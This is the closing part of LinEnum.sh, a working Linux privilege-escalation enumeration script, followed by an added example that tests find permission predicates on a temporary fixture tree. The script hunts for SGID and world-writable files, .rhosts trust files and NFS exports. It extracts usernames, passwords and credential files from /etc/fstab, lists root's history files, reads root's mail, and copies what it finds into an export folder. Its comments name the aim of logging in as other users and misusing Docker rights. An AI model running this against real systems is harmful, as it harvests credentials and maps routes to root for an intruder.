    mkdir $format/guid-files/ 2>/dev/null
    for i in $findguid; do cp $i $format/guid-files/; done 2>/dev/null
  else
    :
  fi
else
  :
fi

#list of 'interesting' guid files - feel free to make additions
if [ "$thorough" = "1" ]; then
  intguid=`find / -perm -2000 -type f 2>/dev/null | grep -w 'nmap\|perl\|awk\|find\|bash\|sh\|man\|more\|less\|vi\|vim\|emacs\|nc\|netcat\|python\|ruby\|lua\|irb\|pl' | xargs -r ls -la 2>/dev/null`
  if [ "$intguid" ]; then
    echo -e "\e[00;33m***Possibly interesting GUID files:\e[00m\n$intguid" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    :
  fi
else
  :
fi

#lists world-writable guid files
if [ "$thorough" = "1" ]; then
  wwguid=`find / -perm -2007 -type f -exec ls -la {} 2>/dev/null \;`
  if [ "$wwguid" ]; then
    echo -e "\e[00;31mWorld-writable GUID files:\e[00m\n$wwguid" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    :
  fi
else
  :
fi

#lists world-writable guid files owned by root
if [ "$thorough" = "1" ]; then
  wwguidrt=`find / -uid 0 -perm -2007 -type f -exec ls -la {} 2>/dev/null \;`
  if [ "$wwguidrt" ]; then
    echo -e "\e[00;31mWorld-writable GUID files owned by root:\e[00m\n$wwguidrt" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    :
  fi
else
  :
fi

#list all world-writable files excluding /proc
if [ "$thorough" = "1" ]; then
  wwfiles=`find / ! -path "*/proc/*" -perm -2 -type f -exec ls -la {} 2>/dev/null \;`
  if [ "$wwfiles" ]; then
    echo -e "\e[00;31mWorld-writable files (excluding /proc):\e[00m\n$wwfiles" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    :
  fi
else
  :
fi

if [ "$thorough" = "1" ]; then
  if [ "$export" ] && [ "$wwfiles" ]; then
    mkdir $format/ww-files/ 2>/dev/null
    for i in $wwfiles; do cp --parents $i $format/ww-files/; done 2>/dev/null
  else
    :
  fi
else
  :
fi

#are any .plan files accessible in /home (could contain useful information)
usrplan=`find /home -iname "*.plan" -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
if [ "$usrplan" ]; then
  echo -e "\e[00;31mPlan file permissions and contents:\e[00m\n$usrplan" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$usrplan" ]; then
  mkdir $format/plan_files/ 2>/dev/null
  for i in $usrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null
else
  :
fi

bsdusrplan=`find /usr/home -iname "*.plan" -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
if [ "$bsdusrplan" ]; then
  echo -e "\e[00;31mPlan file permissions and contents:\e[00m\n$bsdusrplan" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$bsdusrplan" ]; then
  mkdir $format/plan_files/ 2>/dev/null
  for i in $bsdusrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null
else
  :
fi

#are there any .rhosts files accessible - these may allow us to login as another user etc.
rhostsusr=`find /home -iname "*.rhosts" -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
if [ "$rhostsusr" ]; then
  echo -e "\e[00;31mrhost config file(s) and file contents:\e[00m\n$rhostsusr" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$rhostsusr" ]; then
  mkdir $format/rhosts/ 2>/dev/null
  for i in $rhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null
else
  :
fi

bsdrhostsusr=`find /usr/home -iname "*.rhosts" -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
if [ "$bsdrhostsusr" ]; then
  echo -e "\e[00;31mrhost config file(s) and file contents:\e[00m\n$bsdrhostsusr" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$bsdrhostsusr" ]; then
  mkdir $format/rhosts/ 2>/dev/null
  for i in $bsdrhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null
else
  :
fi

rhostssys=`find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;`
if [ "$rhostssys" ]; then
  echo -e "\e[00;31mHosts.equiv file details and file contents: \e[00m\n$rhostssys" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$rhostssys" ]; then
  mkdir $format/rhosts/ 2>/dev/null
  for i in $rhostssys; do cp --parents $i $format/rhosts/; done 2>/dev/null
else
  :
fi

#list nfs shares/permissions etc.
nfsexports=`ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null`
if [ "$nfsexports" ]; then
  echo -e "\e[00;31mNFS config details: \e[00m\n$nfsexports" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$nfsexports" ]; then
  mkdir $format/etc-export/ 2>/dev/null
  cp /etc/exports $format/etc-export/exports 2>/dev/null
else
  :
fi

#looking for credentials in /etc/fstab
fstab=`cat /etc/fstab 2>/dev/null |grep username |awk '{sub(/.*username=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo username: 2>/dev/null; cat /etc/fstab 2>/dev/null |grep password |awk '{sub(/.*password=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo password: 2>/dev/null; cat /etc/fstab 2>/dev/null |grep domain |awk '{sub(/.*domain=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo domain: 2>/dev/null`
if [ "$fstab" ]; then
  echo -e "\e[00;33m***Looks like there are credentials in /etc/fstab!\e[00m\n$fstab" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$fstab" ]; then
  mkdir $format/etc-export/ 2>/dev/null
  cp /etc/fstab $format/etc-export/fstab 2>/dev/null
else
  :
fi

fstabcred=`cat /etc/fstab 2>/dev/null |grep cred |awk '{sub(/.*credentials=/,"");sub(/\,.*/,"")}1' 2>/dev/null | xargs -I{} sh -c 'ls -la {}; cat {}' 2>/dev/null`
if [ "$fstabcred" ]; then
  echo -e "\e[00;33m***/etc/fstab contains a credentials file!\e[00m\n$fstabcred" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$fstabcred" ]; then
  mkdir $format/etc-export/ 2>/dev/null
  cp /etc/fstab $format/etc-export/fstab 2>/dev/null
else
  :
fi

#use supplied keyword and cat *.conf files for potential matches - output will show line number within relevant file path where a match has been located
if [ "$keyword" = "" ]; then
  echo -e "Can't search *.conf files as no keyword was entered\n" |tee -a $report 2>/dev/null
else
  confkey=`find / -maxdepth 4 -name "*.conf" -type f -exec grep -Hn "$keyword" {} \; 2>/dev/null`
  if [ "$confkey" ]; then
    echo -e "\e[00;31mFind keyword ($keyword) in .conf files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$confkey" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    echo -e "\e[00;31mFind keyword ($keyword) in .conf files (recursive 4 levels):\e[00m" |tee -a $report 2>/dev/null
    echo -e "'$keyword' not found in any .conf files" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  fi
fi

if [ "$keyword" = "" ]; then
  :
else
  if [ "$export" ] && [ "$confkey" ]; then
    confkeyfile=`find / -maxdepth 4 -name "*.conf" -type f -exec grep -l "$keyword" {} \; 2>/dev/null`
    mkdir --parents $format/keyword_file_matches/config_files/ 2>/dev/null
    for i in $confkeyfile; do cp --parents $i $format/keyword_file_matches/config_files/ ; done 2>/dev/null
  else
    :
  fi
fi

#use supplied keyword and cat *.log files for potential matches - output will show line number within relevant file path where a match has been located
if [ "$keyword" = "" ];then
  echo -e "Can't search *.log files as no keyword was entered\n" |tee -a $report 2>/dev/null
else
  logkey=`find / -name "*.log" -type f -exec grep -Hn "$keyword" {} \; 2>/dev/null`
  if [ "$logkey" ]; then
    echo -e "\e[00;31mFind keyword ($keyword) in .log files (output format filepath:identified line number where keyword appears):\e[00m\n$logkey" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    echo -e "\e[00;31mFind keyword ($keyword) in .log files:\e[00m" |tee -a $report 2>/dev/null
    echo -e "'$keyword' not found in any .log files" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  fi
fi

if [ "$keyword" = "" ];then
  :
else
  if [ "$export" ] && [ "$logkey" ]; then
    logkeyfile=`find / -name "*.log" -type f -exec grep -l "$keyword" {} \; 2>/dev/null`
    mkdir --parents $format/keyword_file_matches/log_files/ 2>/dev/null
    for i in $logkeyfile; do cp --parents $i $format/keyword_file_matches/log_files/ ; done 2>/dev/null
  else
    :
  fi
fi

#use supplied keyword and cat *.ini files for potential matches - output will show line number within relevant file path where a match has been located
if [ "$keyword" = "" ];then
  echo -e "Can't search *.ini files as no keyword was entered\n" |tee -a $report 2>/dev/null
else
  inikey=`find / -maxdepth 4 -name "*.ini" -type f -exec grep -Hn "$keyword" {} \; 2>/dev/null`
  if [ "$inikey" ]; then
    echo -e "\e[00;31mFind keyword ($keyword) in .ini files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$inikey" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  else
    echo -e "\e[00;31mFind keyword ($keyword) in .ini files (recursive 4 levels):\e[00m" |tee -a $report 2>/dev/null
    echo -e "'$keyword' not found in any .ini files" |tee -a $report 2>/dev/null
    echo -e "\n" |tee -a $report 2>/dev/null
  fi
fi

if [ "$keyword" = "" ];then
  :
else
  if [ "$export" ] && [ "$inikey" ]; then
    inikeyfile=`find / -maxdepth 4 -name "*.ini" -type f -exec grep -l "$keyword" {} \; 2>/dev/null`
    mkdir --parents $format/keyword_file_matches/ini_files/ 2>/dev/null
    for i in $inikeyfile; do cp --parents $i $format/keyword_file_matches/ini_files/ ; done 2>/dev/null
  else
    :
  fi
fi

#quick extract of .conf files from /etc - only 1 level
allconf=`find /etc/ -maxdepth 1 -name "*.conf" -type f -exec ls -la {} \; 2>/dev/null`
if [ "$allconf" ]; then
  echo -e "\e[00;31mAll *.conf files in /etc (recursive 1 level):\e[00m\n$allconf" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$allconf" ]; then
  mkdir $format/conf-files/ 2>/dev/null
  for i in $allconf; do cp --parents $i $format/conf-files/; done 2>/dev/null
else
  :
fi

#extract any user history files that are accessible
usrhist=`ls -la ~/.*_history 2>/dev/null`
if [ "$usrhist" ]; then
  echo -e "\e[00;31mCurrent user's history files:\e[00m\n$usrhist" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$usrhist" ]; then
  mkdir $format/history_files/ 2>/dev/null
  for i in $usrhist; do cp --parents $i $format/history_files/; done 2>/dev/null
else
  :
fi

#can we read roots *_history files - could be passwords stored etc.
roothist=`ls -la /root/.*_history 2>/dev/null`
if [ "$roothist" ]; then
  echo -e "\e[00;33m***Root's history files are accessible!\e[00m\n$roothist" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$roothist" ]; then
  mkdir $format/history_files/ 2>/dev/null
  #$roothist holds ls output, so copy the files themselves rather than the listing
  for i in /root/.*_history; do cp $i $format/history_files/; done 2>/dev/null
else
  :
fi

#is there any mail accessible
readmail=`ls -la /var/mail 2>/dev/null`
if [ "$readmail" ]; then
  echo -e "\e[00;31mAny interesting mail in /var/mail:\e[00m\n$readmail" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

#can we read roots mail
readmailroot=`head /var/mail/root 2>/dev/null`
if [ "$readmailroot" ]; then
  echo -e "\e[00;33m***We can read /var/mail/root! (snippet below)\e[00m\n$readmailroot" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

if [ "$export" ] && [ "$readmailroot" ]; then
  mkdir $format/mail-from-root/ 2>/dev/null
  #$readmailroot holds the mailbox snippet, so copy the mailbox file itself
  cp /var/mail/root $format/mail-from-root/ 2>/dev/null
else
  :
fi

#specific checks - check to see if we're in a docker container
dockercontainer=`cat /proc/self/cgroup 2>/dev/null | grep -i docker 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null`
if [ "$dockercontainer" ]; then
  echo -e "\e[00;33mLooks like we're in a Docker container:\e[00m\n$dockercontainer" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

#specific checks - check to see if we're a docker host
dockerhost=`docker --version 2>/dev/null; docker ps -a 2>/dev/null`
if [ "$dockerhost" ]; then
  echo -e "\e[00;33mLooks like we're hosting Docker:\e[00m\n$dockerhost" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

#specific checks - are we a member of the docker group
dockergrp=`id | grep -i docker 2>/dev/null`
if [ "$dockergrp" ]; then
  echo -e "\e[00;33mWe're a member of the (docker) group - could possibly misuse these rights!:\e[00m\n$dockergrp" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

#specific checks - are there any Dockerfiles present
dockerfiles=`find / -name Dockerfile -exec ls -l {} 2>/dev/null \;`
if [ "$dockerfiles" ]; then
  echo -e "\e[00;31mAnything juicy in the Dockerfile?:\e[00m\n$dockerfiles" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

#specific checks - are there any docker-compose.yml files present
dockeryml=`find / -name docker-compose.yml -exec ls -l {} 2>/dev/null \;`
if [ "$dockeryml" ]; then
  echo -e "\e[00;31mAnything juicy in docker-compose.yml?:\e[00m\n$dockeryml" |tee -a $report 2>/dev/null
  echo -e "\n" |tee -a $report 2>/dev/null
else
  :
fi

echo -e "\e[00;33m### SCAN COMPLETE ####################################\e[00m" |tee -a $report 2>/dev/null

#EndOfScript
--------------------------------------------------------------------------------
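The SUID, SGID and world-writable checks in LinEnum.sh above all rest on find's `-perm -MODE` predicate, which matches when every bit in MODE is set and ignores the rest. The script below is an added example and is not part of LinEnum.sh or the Pentest-Cheat-Sheets repository: it builds a throwaway fixture tree with known mode bits (every path in it is constructed) and runs the same predicates over it, which is the quickest way to confirm what each check reports before acting on a real report. It also shows the one gap worth knowing about when reading the "World-writable SUID files" section: `-perm -4007` requires world read, write and execute, so a setuid file that is world-writable but not world-executable only shows up with `-perm -4002`.

```shell
#!/bin/sh
# Added example (not part of LinEnum.sh): exercise the find(1) permission
# predicates LinEnum relies on against a constructed fixture tree, so the
# semantics of -perm -4000 / -2000 / -2 and the -4007 vs -4002 difference
# can be verified on known inputs.

# Build a throwaway tree with known mode bits. All names here are constructed.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/bin" "$root/tmp"
    : > "$root/bin/suid_tool";   chmod 4755 "$root/bin/suid_tool"   # setuid only
    : > "$root/bin/sgid_tool";   chmod 2755 "$root/bin/sgid_tool"   # setgid only
    : > "$root/bin/bad_suid";    chmod 4777 "$root/bin/bad_suid"    # setuid + world rwx
    : > "$root/bin/odd_suid";    chmod 4622 "$root/bin/odd_suid"    # setuid + world write, no world x
    : > "$root/tmp/scratch.txt"; chmod 0666 "$root/tmp/scratch.txt" # world-writable, no special bits
    : > "$root/bin/normal";      chmod 0755 "$root/bin/normal"      # nothing of interest
    printf '%s\n' "$root"
}

# Print matches relative to the tree root, sorted, one per line.
relpaths() { sed "s|^$1/||" | sort; }

# Same predicates LinEnum uses (findsuid, findguid, wwfiles, wwsuid), plus the
# write-bit-only variant for comparison.
find_suid()        { find "$1" -perm -4000 -type f | relpaths "$1"; }
find_sgid()        { find "$1" -perm -2000 -type f | relpaths "$1"; }
find_ww()          { find "$1" ! -path "*/proc/*" -perm -2 -type f | relpaths "$1"; }
find_ww_suid_rwx() { find "$1" -perm -4007 -type f | relpaths "$1"; }  # LinEnum's wwsuid check
find_ww_suid()     { find "$1" -perm -4002 -type f | relpaths "$1"; }  # world write bit only

# Stand-alone run: build the fixture, print each check's result, clean up.
fixture=$(make_fixture)
for check in find_suid find_sgid find_ww find_ww_suid_rwx find_ww_suid; do
    printf '== %s ==\n' "$check"
    "$check" "$fixture"
done
rm -rf "$fixture"
```

Each helper takes the tree root as its only argument, so pointing one at `/` reproduces the corresponding LinEnum listing (minus the `ls -la` decoration). On the fixture, `find_ww_suid_rwx` reports only `bin/bad_suid`, while `find_ww_suid` also reports `bin/odd_suid`; whether that difference matters depends on what the audit is meant to catch, but it should be a conscious choice rather than an artefact of the mode string.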